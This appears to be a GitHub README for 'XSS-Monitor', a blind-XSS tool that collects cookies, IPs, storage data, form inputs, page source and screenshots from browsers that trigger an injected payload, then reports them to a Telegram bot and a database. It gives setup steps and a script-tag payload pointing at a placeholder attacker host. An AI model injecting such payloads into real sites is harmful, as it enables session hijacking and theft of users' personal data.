Skip to content

Arshiya0x7/XSS-Monitor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

XSS Monitor tool for OOB Blind-XSS

The XSS-Monitor Tool is provided for educational purposes only.

Created By : ​🅰🆁🆂🅷🅸🆈🅰

This tool is designed for testing XSS vulnerabilities and helping make the Internet and Web applications more secure. By using this tool, you get this item from user load xss :

Cookies , Location, UserAgent, User ip, Local Data, Session Data, Inputs item, Page HTML source code, Page Title, ScreenShot of page

send notification to Telegram with BOT and save to database when trigger fired.

How to install :

1.Upload alert.php , eksss.js on your host

2.change "https://YourSiteName.com/alert.php" in eksss.js to your host and path of PHP file and save it.

3.open alert.php and set your information of Database config

    $servername = "localhost";
    $username = "UserDB_xss";
    $password = "PAS-DB";
    $dbname = "DB-name_monitor"

4.set Telegram Bot information and ChatID Acount which you want to be notified :

    $token = "**********Bot_Token***************";
    $chat_id = "****YourTelegramChatID";

5.save alert.php

How to Use:

use this payload for test :

   <script src=https://YourSiteName.com/eksss.js></script>

About

XSS Monitor tool for OOB Blind-XSS

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published